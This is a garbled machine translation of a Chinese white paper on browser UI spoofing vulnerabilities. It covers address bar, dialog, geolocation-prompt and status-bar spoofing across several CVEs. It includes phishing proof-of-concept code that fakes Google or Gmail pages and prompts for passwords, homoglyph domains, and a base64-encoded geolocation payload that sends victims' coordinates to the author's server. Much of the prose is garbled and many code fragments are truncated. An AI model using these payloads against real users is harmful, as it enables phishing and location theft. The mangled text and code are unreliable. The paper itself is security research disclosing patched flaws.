Академический Документы
Профессиональный Документы
Культура Документы
2017/10/16
table of Contents
2.1 Address Bar Spoofing + multiple security mechanisms to bypass ( CVE-2015-3755 ) ................................. 7
2.5 Colon: triggered Address Bar Spoofing ( CVE-2016-1707 ) ............................................ twenty two
2.11 Search engine triggered the address bar spoofing ( CVE-2017-2517 ) ...................................... 32
1/41
Browser UI, It refers to the browser user interface. Browser After decades of development, the user interface does not have a
Uniform requirements standard, most modern browsers user interface include: forward and back buttons, refresh and stop raising
Upload button, address bar, status bar, the page display window, view the source code window, labels. There may also have some
Other user interfaces, such as Download Manager, page search, notifications, system management options, incognito windows and so on. We can
To the Browser UI Believed to be a front-end manager tabbed page or Web Shell, users do not have to consider Liu
How to look at the underlying application is processing data, all network behavioral outcomes, by Browser UI Go to a show
Households.
From a security point of view, the browser UI The most prone to attacks is to deceive the user interface, that is, UI Spoof .
usually UI Spoof It is used for phishing attacks use. Phishing is a social engineering are used to trick users into
And access to sensitive information of the user a means of attack, usually use fake websites to lure users from the visual senses
I believe it is a legitimate, bona fide, when the user operates the browser, sensitive information is likely to be the attacker to get.
So the browser UX In the development team UI Process, convenient user while browsing on UI On the security model
Design, strategy, logic is very important, safe UI It can help users quickly and accurately make the right while online
Security decisions. and UI Once the defects, an attacker could forge browser UI In certain key information into
This white paper will tell you what is in UI Spoof Vulnerabilities, and multiple browsers UI Security loopholes
1 UI Spoof Outline
UI Spoof The user interface is spoofing, phishing is often used to use, this allows the user to attack by visual
Feel tricked into making an insecure network behavior. In the browser address bar, status bar, dialog boxes, usually the most vulnerable UI
Spoof The place. For users UX Is a purely subjective experience, so browser UI Safety design, for each
Front-end UI Module position, size, color, and other features, all require careful planning and consideration, especially in the small screen
The mobile browser, every inch of pixels browser UI It is precious. Imagine a credible pixels, if you can
It is controlled by the attacker, resulting in arbitrary pseudo UI Content, including fake browser itself UI Modules, which are very dangerous thing
2/41
situation. In the browser UI In FIG. 1 Some called "dead line shown in FIG. 1 "Borders, such as the top of the browser
URL The address bar, this part is completely controlled by the browser, but also allows users to fully trust UI Module. The dead line
Address bar located at the junction of the page display, if you trust in Dead Man Walking pixels or more, then it would be safe, anti
It will be "dead."
Map 1
Address Bar Spoofing Vulnerability, forged Web The most basic security boundary, source ( orgin) . Web The protocol comprises a source, a main
Machines and ports, three caught the same express homology. In modern browsers UI In the address bar of deliberately weakening the protocols and ports
The show, which take into account ordinary users do not understand the source concept. such as http://www.163.com:80 , Chrome Address Bar
shown as www.163.com ,front end UI The display does not affect the parsing of the underlying source. So, we can only believe
To forge the host (and domain name IP ), Is an address bar spoofing vulnerability.
Google He made it clear that: "We recognize that modern browser address bar is the only reliable indicator of safety." Also
That is, if the address bar spoofing occurs, then all users to follow Web Trust page content will all collapse.
In the browser address bar, URL Initially only support ASCII Character, and later introduced Unicode Character Set for support
Any language in the world. but Unicode Character set is very large, which brings together all of the coding world,
Currently available character has more than ten million units and growing. In the browser address bar into these strange coding
When the line of sight rendering process, appearance and character of the display order may be user-generated fraud.
in Unicode There are a lot of similar character, sometimes two different Unicode String, small size resolution
Screen, which are difficult to distinguish in appearance. For example slash " ( U + 2216) "with"\( U + FF3C) "While they function
1 https://textslashplain.com/2017/01/14/the-line-of-death/
3/41
Different but very similar appearance. English characters a ( U + 0061 ) 2 From Table 1 Can be seen, there are many similar characters.
table 1
In addition to coding issues, the two characters in the address bar displays "Where are you (current URL ) And you're going (about to navigation
of URL ) ", In competition with each other, when the interchangeable due to some logical error which led to the deception.
Early certain browsers, this code can cause an address bar spoofing.
In the mobile browser address bar UI Display can be called megapixel race, because the mobile terminal screen is too small. Long
URL Problems may arise will display the address bar. No matter how small the address bar visual space, we are sure to follow display true
2 https://unicode.org/cldr/utility/confusables.jsp?a=a&r=None
4/41
The principle is the source of 3 .
Map 2
Figure 2 The last two shown in the address bar shows the policy is wrong. The first one is showing URL The far left, only
It shows part of a multi-level domain name; the second strategy is to only show URL The far right, shows URL of
pathname section. This two display modes, are not the real source displayed evil.com The user will believe that the current visit
Q site is a login.your-bank.com .
In modern browsers, the address bar in addition to the current page URL Type the user to navigate and acceptance of URL These ones
Outside the most basic functions, but also added a lot of new functions and responsibilities, for example, most browsers have the address bar
And search bar into one, vulgar saying smart address bar, it may be due to this design URL And search logic presence upmix
A warning dialog box ( alert ()) , Confirmation dialog ( confirm ()) Prompt dialog box ( prompt ()) It is the most commonly used browser
Three important dialog. The dialog box for warnings, or prompt the user to enter information. In addition, some of its browser
His function will trigger a number of its own dialog box prompts, such as geopositioning ( Geolocation API) Authentication dialog,
notification( Notification API) The dialog boxes. On most dialog deception, by its pop-up window in a non-boot
3 https://www.chromium.org/Home/chromium-security/enamel
5/41
Or forged source display triggered. In addition, if the dialog box you can insert any content, will significantly enhance the success rate of deception.
Here is a simple example, such as access to the site www.xisigr.com Will pop up a warning dialog box, then the dialog box
That is, by the xisigr.com Domain derived, xisigr.com It is to start the window. If we can make this dialog
google.com Domain pop-up, then this dialog is the cross-domain, and here google.com It is a non-startup window.
For the dialog display source, such as from www.xisigr.com Pop up a dialog box usually considerably on
Source information shows, displayed normal www.xisigr.com . If you change the source, to make it appear as www.google.com , Which
Forged source information display. And this is a bypass the same origin policy.
For those dialog box does not show the source of information, if the dialog box text can be injected even line breaks (\ r \ n ),that
What an attacker could inject www.google.com Such a string, and adjust the display position so that it appears to be the primary dialog
Modern browsers, the status bar is usually not automatically appear in the main page window. Only when the page is loaded or display the link address
When the surface, the status bar will emerge in the lower left corner of the browser window. Deception on the status bar are the following:
( 1 ) When the mouse moves over the link, the status bar displays A address. When you click the link, steering B address. The party
Of course, this is not a loophole problem, just a little trick. And the browser has long been party to support this process
formula.
( 2 )use CSS Draw a original ecological status bar. in CSS3 It adds support rounded corners and shadow, which makes
We can use CSS Draw a browser exactly the same and the status bar, in turn, can have an effect deceive the user.
The problem from a security perspective, the potential security risk is not so obvious. But still I want to throw this author
The topic of discussion: the browser when the original ecology UI When can be fully simulated user scripts, fraud might occur.
6/41
2 UI Spoof Detailed real case
CVE-2015-3755 The authors found that a bypass Webkit Multiple security vulnerabilities, causes vulnerability Webkit
Parsing URL Port number of the logical error caused when, after an attacker can exploit URL Address Bar Spoofing attack
Strike, and can bypass the same-origin policy dialog box displays the source, and bypass the address bar HTTPS Security lock protection mechanism.
Affected Products: Apple Safari <8.0.8, Apple Safari <7.1.8, Apple Safari <6.2.8, iOS <8.4.1
Vulnerability Announcement:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3755
Well, this vulnerability is how did this happen? We look directly CVE-2015-3755 of POC .
onclick = "setTimeout ( 'fake ()', 100)"> <h1> click me </ h1> </a>
<Script>
function fake () {
t.document.body.innerHTML = '<title> Gmail </ title> <H1> Fake Page !!! - hack by
</ Script>
The above code is saved as test.html ,E.g: http://www.xisigr.com/test.html . Then in the affected version
Run. Figure 3 It is the author of the illustrated iOS Version Safari Running results, URL Deceive + source dialog box is displayed bypass
7/41
Map 3
We know that the scope of the network system port number: port is empty, or 16 Bit unsigned integer. The browser parses
URL When, wherein the port number if errors are found, for example, non-numeric, typically to pre-defined system error
https://www.gmail.com:443.
This is an abnormal number of port URL . Safari Browser in dealing with this exception, there was a logic error. finally
Stay in the address bar displays www.gmail.com And we can to page DOM Proceed as follows:
t.document.body.innerHTML = '<title> Gmail </ title> <H1> Fake Page !!! - hack by
when alert (1) When the pop-up dialog box displays the source https://www.gmail.com . Here dialog box displays the source of bypass
The same-origin policy, because in fact the current field or xisigr.com . If the code is changed alert (document.domain) ,
8/41
Map 4
At the same time there are also bypassed Safari Determine the safety lock mechanism identified. We know that if access is https protocol
The site, the browser displays security lock logo in the address bar. This can quickly tell the user, the network you are visiting
Station transmission is encrypted and is safe. But our visit here was a mistake unencrypted URL , but Safari Still
Repair the CVE-2015-3755 After this loophole, Safari Will be in iOS The system was abolished dialog source
Click on Click me Will be playing a alert (1) The dialog boxes that UI It will only display " 1 "Without the active
Display. and Chrome with Firefox Dialog box displays the source. Figure 5 Below:
9/41
Map 5
The dialog box displays the source, this would comply with a normal security logic. I do not know why Safari In the repair complete CVE-
2015-3755 After this loophole, the dialog would do such a treatment. No source is displayed, will increase the risk of deception
CVE-2015-7093 This vulnerability is the author of discovery in this case. Causes of vulnerability, in Safari Dialogue
Box to start the non-pop-up window, and the dialog UI It can be injected in the content, to display the forged source. An attacker who exploited this
CVE-2015-7093 of POC:
<Html>
</ Html>
10/41
<Html>
<Body>
<Script>
function go () {
if (window.opener) {
'<\ / Script>';
}}
go ();
</ Script>
</ Body>
</ Html>
in Safari Run http://test.com/1.html ,then click Click me Button when the user enters in the dialog box
After the information is likely to be stolen. The results are shown running 6 , The user input in the dialog box 123 :
Map 6
We gradually dismantling POC Code, further analysis of how this is achieved spoofing attack. First of all, we have to
There are clear 2 Pages window, the window A for www.test.com/1.html ,window B for www.test.com/2.html . window
11/41
window B The code is mainly completed 2 Function.
Code:
window.opener.location =
'Data: text / html, <title> test </ title> <script> pass = prompt ( "https: // go
in B To navigate to the window https://www.google.com when, A In the dialog box window B Window significant
Show this dialog box is blocked B Navigate to the window https://www.google.com, It is in a wait state. This
The results shown are formed deception previous figure. And the attacker to insert the contents of the more deceptive effect in the dialog box, forgery
In addition to the browser alert () / prompt () / confirm () Outside the box, there are some Web API On self-generated
Dialog box, such as geopositioning ( Geolocation API) Authentication dialog box, message notification ( Notification API) The dialog boxes, etc.,
These consist Web API Derived from the dialog box, there are also risks of deception.
CVE-2016-1779 This vulnerability is caused by a geolocation authentication dialog. Geolocation API It is used
The host device to get the user's location, and it has a comprehensive mechanism to protect user privacy 4 . To use geographic
Positioning the user must be licensed before they can, unless it has been previously confirmed the trust relationship. Browser in use
Geolocation API When it will pop up a box to notify the user authentication, and certification in this box UI On this page must contain
Surface URL . CVE-2016-1779 This vulnerability may allow a remote attacker to bypass the same origin policy in any domain authentication boxes bomb
Out, and the user can obtain the geographic location When the user clicks allowed.
4 https://www.w3.org/TR/geolocation-API/#security
12/41
Vulnerability Announcement: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1779
trigger Geolocation Authentication box is very simple, as long as we can run the following code, the premise is not allowed before
<Script>
navigator.geolocation.getCurrentPosition (success);
</ Script>
E.g: http://www.test.com/geo.html . After the run, the browser will pop up authentication dialog on the current page,
From this box triggers the authentication process, the author had the following thoughts.
Thus, according to this idea, continue testing. In the process, I found iOS under Safari with Chrome in
use data: When parsing code, authentication source will be ": //." Figure 7 Fig.
KbmF2aWdhdG9yLmdlb2xvY2F0aW9uLmdldEN1cnJlbnRQb3NpdGlvbihzdWNjZXNzKTsKPC9zY3J
pcHQ + Cg ==
13/41
Map 7
<Script>
function geo () {
window.open ( 'http://www.google.com');
location =
+ CjxtZXRhIGNoYXJzZXQ9dXRmLTggLz4KPHRpdGxlPmdlb2xvY2F0aW9uPC90aXRsZT4KPGJvZHk
+ CjxzY3JpcHQ
+ CmZ1bmN0aW9uIHN1Y2Nlc3MocG9zaXRpb24pIHsKZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3J
lbW90ZScpLnNyYz0iaHR0cDovL3hpc2lnci5jb20vdGVzdC9nZW8v
Z2V0LnBocD9nZW9sb2NhdGlvbj0iKyItLS0tLS0iK2VuY29kZVVSSUNvbXBvbmVudChwb3NpdGlv
bi5jb29yZHMubGF0aXR1ZGUpKyIsIitlbmNvZGVVUklDb21wb25lb
nQocG9zaXRpb24uY29vcmRzLmxvbmdpdHVkZSk7CiB9Cm5hdmlnYXRvci5nZW9sb2NhdGlvbi5nZ
XRDdXJyZW50UG9zaXRpb24oc3VjY2Vzcyk7Cjwvc2NyaXB0Pgo8aW
14/41
}
</ Script>
<Head>
<Body>
<Script>
on.coords.longitude);
navigator.geolocation.getCurrentPosition (success);
</ Script>
</ Body>
</ Html>
15/41
Map 8
Remember earlier we said "Source on the certification box displays must be the source of the current page and the same." At this point, we
Has successfully bypass the same origin policy, the data: Domain Geolocation Source authentication pop-up window in a non-start, is formed of a
A certification frame spoofing attacks. When the user clicks allow, the system does not check certification UI Sources and sources on the current page is
Here there are about CVE-2016-1779 The little story to share. The authors of this loophole to submit
APPLE Shortly after the company, in 2016/1/6 , I received some feedback information on the location of the server. Because mention
Post POC Already clear that the use of their own servers built a vulnerability verification environment, if triggered, data
16/41
Figure 9
After reviewing discovery, 37.332578830316436, -122.03068509201906, Display of official Apple Of the total US
10
17/41
It is found from the acquired data is returned, the researchers were at Apple 2016/1/6 , 2016/1/7 , 2016/1/8 ,
2016/1/10 , 2016/1/20 , 2016/1/22 , 2016/1/28 This 7 Time periods triggered POC , And the address is the same,
Apple is based in the United States. Apple was possible to verify the researchers, did not build their own vulnerability verification environment, but
Direct use provided by the author POC The original environment, resulting in validation vulnerability back to a time location
Apple security personnel should be aware of this problem, because in POC Clearly states that data will be back to this address
xisigr.com/test/geo/info.txt . However, they are triggered or continuous 7 Second vulnerability is negligent or does not care
Apple's headquarters location is leaked out, although this address on the Internet can be found any. But even so, for
Who is still very surprised, geographic Apple testers and their work schedules, and it was to get up.
This of course is not just a story, just want to remind you that in real sophisticated cyber attack, the letter clues
Interest rates can sometimes be a breakthrough, "thousands of miles of dikes destroyed the colony," the. Do not let such an important geographical position similar to private information
Versus " http "" https "" ftp "These types of common network URL scheme Local types URL scheme
Spoofing attack on also exist, and more likely to be overlooked by programmers and users. Local types URL scheme
Have" data "" about "" blob "" filesystem "" file . " CVE-2016-5189 its about" blob URLs "on
Affected Products: Google Chrome <54.0.2840.59 for Windows, Mac, Linux. 54.0.2840.85 for
Android
blob (binary large object) , Binary object, a container can store binary files. " blob URLs "
Scheme allows From Web Applications secure access to binary data, that is, from the "memory" of blob References.
One" blob URLs "Includes a host and a source of UUID The path indicated. blob = scheme ":" origin "/" UUID .
scheme always blob , origin It is generated blob URLs The source, UUID Defining a reference [ RFC4122] .
18/41
blob: https: //example.org/ea3527a8-134f-46ae-be03-421f067d97f0
URL.createObjectURL () It creates a static method DOMString ,its URL Represent parameters for
Like. This one URL Life cycle and create its window document Binding. This new URL Object represents
In each call createObjectURL () When the method will create a new URL Object, even if you already use
The same object as a parameter to create too. When no longer needed URL When objects, each must by calling
URL.revokeObjectURL () Method to release. The browser will automatically release them when the document exit, but in order to
Get the best performance and memory usage, you should take the initiative to relieve them in a safe opportunity.
<Script>
function aa () {
args = [ '123456'];
</ Script>
in PC end Chrome , Safari , Firefox I click your browser click me Button will pop up a blob URLs
in Edge Browser, you can not execute the code. and, Edge in blob URLs This is so, there is no
<Script>
function pwned () {
t.document.write ( "<h1> phishing page </ h1> <title> google </ title>");
t.stop ();
19/41
}
</ Script>
<br>
Map 11
Look POC The code is not difficult to find the key to this code URL in" www.google.com ... @ xisigr.com . "
This uses the @ symbol to join a domain name string before the real domain name www.google.com , And
www.google.com After adding a lot of white space characters. So the real domain name is hidden behind in the browser to
You can not see the address bar. Users will mistakenly believe that this is google.com Domain " blob URLs " , Resulting in a spoofing attack.
CVE-2016-7623 same with" blob URLs Spoofing Vulnerability on. "Loophole causes and CVE-2016-5189 similar,
Slightly different whitespace using% EF% B9% BA ( U + FE7A ), There is no longer much introduction. Figure 12 The
Shows.
20/41
Map 12
CVE-2016-7623 PoC
-------- ------------
<Script>
function go () {
function ipad () {
var t =
window.open ( 'blob: http: //www.google.com'+Array (0x50) .join ( "% EF% B9% BA") +' @
function iphone () {
var t =
window.open ( 'blob: http: //www.google.com'+Array (0x20) .join ( "% EF% B9% BA") +' @
function blob () {
var blob = new Blob ([], {type: "text / html; charset = utf-8"});
21/41
setTimeout ( 'iphone ()', '500');
</ Script>
CVE-2016-5189 with CVE-2016-7623 Both flaws are rendered Blob-URLs The user name and password Ministry
Points, which is extremely dangerous. One URL The username and password should not be rendered because they can be mistaken
CVE-2016-1707 This vulnerability is in the author 2016 year 6 Monthly reports to Google one of iOS Version Chrome
Browser address bar spoofing vulnerability. This loophole has received a Google 3000 $ The vulnerability reward. Attack effect is shown 13
Fig.
Map 13
22/41
<Script>
LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206
Oic7DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChsaW5rKTsNCiAgICBsaW5rLmNsaWNr
KCk7DQo8L3NjcmlwdD4 = ";
function pwned () {
</ Script>
Now the entire loading process to interpret what the code. First click click me This link to open a browser
name for aaaa New window, to load this page https://hack.com :: This address can easily write. 500 Microsecond
After running pwned () ,in aaaa Window opens https://www.gmail.com Of course this URL It can be empty. Now
So far, everything is normal code is run, then this code is the core code to trigger the vulnerability.
<Script>
document.body.appendChild (link);
link.click ();
</ Script>
in aaaa Window page to submit ( commit ) https://gmail.com :: This is a very wonderful thing,
https://gmail.com :: This is an invalid address, how to be submitted to it. After trying a variety of methods, I found
use a Click on the tab of ways to do ( window.open/location Can not), and the address is not valid at this
In a wait state ( pending status) . At this point, the actual Chrome It is loaded about: blank (I have come to
about: blank Domain), but in the final process URL When displaying the address bar, Chrome But he chose to wait in a state of
https://gmail.com :: As a last address after submission, loaded https://gmail.com :: in URL The address bar will
https://gmail.com This presented two :: will be hidden. At this point, the entire loading process is complete. A perfect
23/41
How to fix
This vulnerability most critical areas that, Chrome Allows Web When the page loads, submitted an invalid address
As a result. Google This is also based on a given patch file is loaded Web When a page is not allowed to submit invalid
Address, if an invalid address is detected, then the direct current URL for about: blank .
+ // "about: blank".
URL
<< "currentURL = [" << currentURL << "]" << std :: endl
"]";
// This is the point where the document's URL has actually changed, and
+ if (! _lastRegisteredRequestURL.is_valid () &&
+ _documentURL! = _lastRegisteredRequestURL) {
| _documentURL |
+}
+ (! _lastRegisteredRequestURL.is_valid () &&
[Self commitPendingNavigationInfo];
24/41
2.6 Right-click on the address bar spoofing triggered ( CVE-2016-5222 )
In the above CVE-2016-1707 This loophole, we use two consecutive colons (:) constructed wrong URL
Which led to the vulnerability to occur. CVE-2016-5222 This vulnerability still use this technique.
For Web Links page, we can use a variety of ways to open: left-click, right-click to play
Open a new window, drag and drop the link into the address bar. Click once on the left, you are a link to open the most frequently used method. The Right
Hit new window and drag and drop links, the method is less used, the designer is browser may ignore the security of
local. CVE-2016-5222 This loophole is another way, resulting in vulnerabilities occur when you use the right to open a new window.
We are at Chrome The following code running in a browser, it is a very simple code. Open, using the right point
Map 14
Figure 14 Can be found, although navigate to google.com Page, but the address bar URL You can see and
Usually not the same, google.com: . At that time I feel that this process URL When there may be some errors.
Next, I tried a different URL Submission method, finally found a can URL Spoof The mode of attack:
When the page automatically jump, jump is successful will navigate to the jump page, the address bar URL Not updated,
will not change. In other words, if you want to Google.com get on URL Spoof Just find a Google The re
25/41
To jump on it. Run the following code:
<A
href = "www.google.com :: / url? q = http% 3A% 2F% 2Fxisigr.com% 2Ftest% 2Fspoof% 2Fchrome
% 2F3.html & sa = D & sntz = 1 & usg = AFQjCNG-QnLGG1ixIlOzlpZQn5cweSU3Cw "> 22222 </a>
Figure 15 , The redirection action occurs, the address bar URL Still stuck in google.com , Finished spoofing attack
to make.
Map 15
From the above CVE-2016-5222 Vulnerabilities, we discussed different ways to open a Web page (left click,
Right open a new window, drag and drop links), it is not difficult to be inspired, to refine the various functions of the browser and then increase the attack surface,
The use of low-frequency multi-function security and defense is weakest. CVE-2016-7592 Also follow this line of thought, the
26/41
Affected Products: Apple Safari <10.0.2
Usually in mining URL Spoof Loopholes process, we constructed Payload Often used window.open () ,
But do not ignore window.open () Different parameters in the parameter, it will also increase the attack path.
<Script>
function phishing () {
aa = window.open ( 'http://www.google.com');
aa.alert ( "Your name is:" + name + "||" + "Your Password is:" + passwd);
</ Script>
for URL Spoof Loopholes, this POC Framework is very classic but also very common. Classic is to say in the early
URL Spoof Vulnerability, this POC Get rid of a lot of browser; common is that after some time, the browser early
Now we window.open () Increased parameters, start window pops up and change the window size. See below POC ,
<Script>
function phishing () {
aa.alert ( "Your name is:" + name + "||" + "Your Password is:" + passwd);
</ Script>
We changed the size of the window, so that javascript Dialog blocked URL Navigate to take effect. Pop-ups and non-full screen window is a necessary
condition, only in the environmental conditions before they can make javascript Dialog for URL Were blocking navigation
27/41
Plug. Figure 16 It is run POC After the whole process of deception.
Map 16
28/41
2.9 Right to left ( RTL) Direction URL Deception ( CVE-2017-5072)
We have already mentioned that some of the language is to be displayed from right to left, such as Arabic language, Hebrew language. package
Text containing these characters can run in both directions, from left to right ( LTR ) Or from right to left ( RTL ). When a URL
When bidirectional text is included, it should be handled in a logical sequence of visual rendering and the address bar of it. Next we say
Unicode Bidirectional algorithm 5 (Referred to as BIDI ) For processing the URL of bidirectional text. Bi-directional text refers to the same
A string, both contain characters from left to right of the display also contains characters from right to left. For example, the most widely used Latin
The text is displayed from left to right ( LTR ), While the Arabic text, the Hebrew text is from right to left ( RTL) . When using two-way text
When present, the character is still a logical order explanation, only the display order of the parallel lines is affected. The display order bidirectional text
Depending on the direction attribute characters in the text. When the browser URL in dealing with a bi-directional text, there may be serious
Security issues, is displayed in the wrong order, which led to URL Spoofing attacks.
CVE-2017-5072
POC: http://127.0.0.1/%D8%A7/example.org
Character is U + 0627 , Arabic characters are displayed direction RTL . If the browser is not reasonable to do this two-way text URL
The strategy, then the% D8% A7 May force the URL use RTL To show that the address bar final presentation to the user
Yes example.org/ / 127.0.0.1 . Users will think the site is currently visited example.org , But the actual visit is
5 http://unicode.org/reports/tr9/
29/41
Map 17
2003 Released in the norms of international domain names [ rfc3490] 6 It allows most Unicode Use in the domain name, the
After this general specification called IDNA2003 . After the 2010 In approved the release of IDNA2003 Revisions
[Rfc5895] 7 , Said the revision is IDNA2008 . but IDNA2003 with IDNA2008 And no effective solutions to international
Some domain name in question, then, Unicode Union released [ UTS-46] 8 It addresses some compatibility issues.
in IDNA Used PunyCode Algorithm to achieve non ASCII Domain name to ASCII It converts domain names. PunyCode
Algorithm can be any non ASCII of Unicode The only mapped to a string using only letters, numbers and
Hyphen string encoded domain name in front of all added xn-- To indicate that this is a PunyCode coding. This means
Us can xn-- Later a member of any character, which is likely to deceive users. URL Site http: // . com ,
6 https://tools.ietf.org/html/rfc3490
7 https://tools.ietf.org/html/rfc5895
8 http://unicode.org/reports/tr46/
30/41
CVE-2017-5060 Is a typical use Cyrillic characters caused URL Spoof Vulnerability by Xudong Zheng 9
Find. Vulnerability to because, when the domain name in the Cyrillic script are all characters in the Chrome The address bar of visual rendering straight
Then display the Cyrillic character graphics, and do not use PunyCode Transcoding. And some Latin and Cyrillic characters
The appearance of text characters are very similar, so the user from the visual point of view, is that the address bar www.apple.com .
When you Chrome Access https://www.xn--80ak6aa92e.com/ , See Fig. 18 effect. However, when the user points
Green hit a small lock position to view the source information ( Origin Info Bubble , OIB ) You can see the real or logical order
Map 18
Chrome In receiving this vulnerability 2 Months later, he fixes this vulnerability. And given the vulnerability discoverer 2000 US dollar
Reward 10 .
Dramatically, the discoverer of the vulnerability of the same report this issue to the Firefox ,but Firefox Clear back
A fix is not 11 . Figure 19 As shown, when the access https://www.xn--80ak6aa92e.com , Address bar
9 https://www.xudongz.com/blog/2017/idn-phishing/
10 https://bugs.chromium.org/p/chromium/issues/detail?id=683314
11 https://bugzilla.mozilla.org/show_bug.cgi?id=1332714
31/41
Map 19
Firefox The reason given is security team Cyrillic characters should not be treated as second-class citizens, to the network
Equal opportunity to develop the characters other than Latin. And they think, domain registrars should bear part of the responsibility
Either, this should not be spoofed domain name registered to the user. And encourage users to complain domain name registrar.
Correct Firefox This security risk "turning a blind eye" approach, many people raised objections. For on this domain and
Seemingly identical on the certificate URL deceive, Firefox Do not do anything, frankly I chose the business first, safety
In modern browsers, the address bar in addition to the current page URL Type the user to navigate and acceptance of URL These ones
Outside the most basic functions, but also added a lot of new functions and responsibilities, for example, most browsers have the address bar
And search bar into one, vulgar saying smart address bar, this design may vary URL And the search for the presence of logical disorders
Resulting in the address bar spoofing. CVE-2017-2517 It is Safari An address bar on the search engines due to leakage caused by fraud
hole.
Safari of URL The address bar and search bar are merged together, in Safari Default settings selectable search engine
32/41
Engine: such as Google, Yahoo, Bing, Baidu, DuckDuckGo ....... Safari Here there is a logical error, when
Content search in the default search engine is a URL, URL The address bar will be displayed in this website.
For example, our default search engine is Baidu, and Baidu search google.com . You can see the address bar significantly
It is shown google.com Because the browser context state is considered in the search environment, the status bar presents content
Search content. This may produce a deception of the user that the URL in the address bar is at this time google.com . Figure
20 Fig.
Map 20
Further thought, if there is a default search engine XSS , An attacker can fake the address bar in the case of the same
You can control the page content, to complete a perfect phishing attacks.
The role of the browser status bar that tells the user that you would want to go. The lower left corner of the status bar is usually displayed in the browser.
Historically, the status bar has been fixed as a browser UI Module is fixed in the lowermost end. Later browser front-end display more
Bubbling is Jian Jie, the status bar instead of the way to show ( Status Bubble ) 12 , Only when the mouse moves over the link status
12 https://www.chromium.org/user-experience/status-bubble
33/41
Bar will be displayed.
Figure twenty one Shown, respectively, Chrome / Firefox / IE The browser when the mouse is moved to google When the link, like
The status bar will be like a bubble emerges as the lower left corner in the browser area, which URL Navigate to address both. When the mouse
Remove the connection time scale, the address bar will instantly disappear.
Not difficult to find, this browser status bar design way to make UI Display more Jian Jie, optimizing the user clicks the link
Experience. But from another point of view, the status bar UI Is displayed in the browser area of the page, the user can use the script
To control this area, whether this will bring some security risk it?
in CSS3 It has been added to fillet ( border-radius ),shadow( box-shadow ), And gradient ( Gradients )of
POC :
<Head>
34/41
<Meta content = "text / html; charset = utf-8" http-equiv = "Content-Type">
<Style>
. chrome {
background: #DFDFDF;
width: 230px;
height: 23px;
- webkit-border-top-right-radius: 4px;
font-size: 12px;
color: # 666666;
line-height: 23px;
position: absolute;
bottom: 0px;
left: 0px;
display: none;
. Link {
color: blue;
text-decoration: underline;
cursor: pointer;
</ Style>
<Script>
location = url;
</ Script>
</ Head>
<Body>
<Center>
<H1> CSS Handling Status Bar Spoofing Vulnerability </ h1> <br> <br> <br> <br>
<B> The True Status Bar: </ b> <a href="http://www.google.com"> Google </a>
<br> <br>
35/41
<Div id = "statusbar" class = "chrome"> www.google.com </ div>
</ Body>
</ Html>
With Chrome For example, access to online DEMO: http://xisigr.com/html5/css/spoofurl.html . Move the mouse
To The True Status Bar: Google . Show the real address bar, as twenty two Below:
Move the mouse to The Spoof Status Bar: Google . Show fake address bar, as twenty three Below:
36/41
Both can be found bubbling status bar is basically identical. This problem, in the author 2011 Discovered and
This was contacted several browser vendors reported the problem. They feedback, this is an interesting question, but does not intend to
repair. Until now, the use of CSS Forge a real address bar still can. Securityfocus.com Was closed
Nevertheless, we still want to CSS Fake address bar on this issue here, be open discussion.
When the user can use a script to forge a browser key UI When deception is likely to happen. We can then look back,
Browser we mentioned earlier in "Dead Man Walking" boundary, beyond which the trust will not happen again.
3 future
In the future for a long period of time, the browser UI Still in a chaotic state, the various browser vendors
For the same UI Understanding and to show there are also many differences. For example, the security indicator modern browser address bar, is
The most common browser security UI It is used to identify the current security status of the site. So for unsecured network protocol ( http) ,
Using security warning symbol ' X The 'or'! The '; for secure and reliable network protocols ( https) , A lock identification symbol
Or shield, its color is red or green. Figure twenty four Shown you can see, each browser vendors, for the same
Site or a technical term representing a status indicator displayed is not the same.
13 http://www.securityfocus.com/bid/47547
14 http://www.securityfocus.com/bid/47548
15 http://www.securityfocus.com/bid/47549
37/41
Map twenty four
Google in" Rethinking Connection Security Indicators " 16 The security indicator survey two questions,
https : What is the URL to the left of the green symbol mean to you? http : What is the URL to the left of the white symbols mean to you?
Google Investigated 1329 People Chrome Browser security indicator is displayed during normal web browsing understand whether,
then Google The results of the survey are divided into 7 Class: "Connect, identity, protocols, security, icon appearance, I do not know, and
Incorrect theory. "While most (but non-expert) of respondents https Indicator having at least a basic understanding,
In our discussions browser UI Security, to coincide with the desktop browser experience to the migration and transition mobile browser.
Relative to the previous desktop era, people gradually began to shift to the time of day using similar iPad , iPhone , Apple
16 https://www.usenix.org/system/files/conference/soups2016/soups2016-paper-porter-felt.pdf
38/41
Map 25
We have imagined using a browser on your watch. Hackers break up Apple Watch After its run at the
Map 26
Browser screen smaller and smaller, the browser UI Become more pixels must struggle inch. In the Ping Heng user experience and security
For example, the following four mobile browser and simultaneous access to Baidu www.baidu.com . You can see the address bar display
17 http://www.mobypicture.com/user/comex/view/18097875
39/41
Map 27
The first browser shows https Security identifier, and shows the complete domain name.
Fourth browser shows https Security identifier, and only display the title.
In this four browser address bar UI , Which we think the browser address bar displays the safer it? For the latter
Both browsers address bar presentation, as long as the attacker to add malicious pages < title> Baidu, you know
History is always moving forward, we enjoy the challenge of bringing new things, but also tie him to face old things brought. Liu
The browser has been around for decades, many of the policy was introduced, grammar still in use. With the push of time
Shift, when more and more intense confrontation between offensive and defensive, some of the old policy, syntax " Safety " Before, becoming more and more conflict
Wu. For example, Dialog alert (), prompt (), confirm (), in 1995 In just let Javascript Together into the browser 18 . This
Some of the dialog box synchronization method, might exist in most modern browsers, because javascript Engine requires users to
18 https://developers.google.com/web/updates/2017/03/dialogs-policy
40/41
Pause, close the dialog box, will continue to perform the following procedures. UI Spoof Vulnerabilities, many of them are due to the Dialog
This characteristic, blocking certain processes and production. Currently Chrome Browser has gradually started to decrease in a box
These scenarios use and recommend a few options dialog box, for example, Notifications API < dialog> .
41/41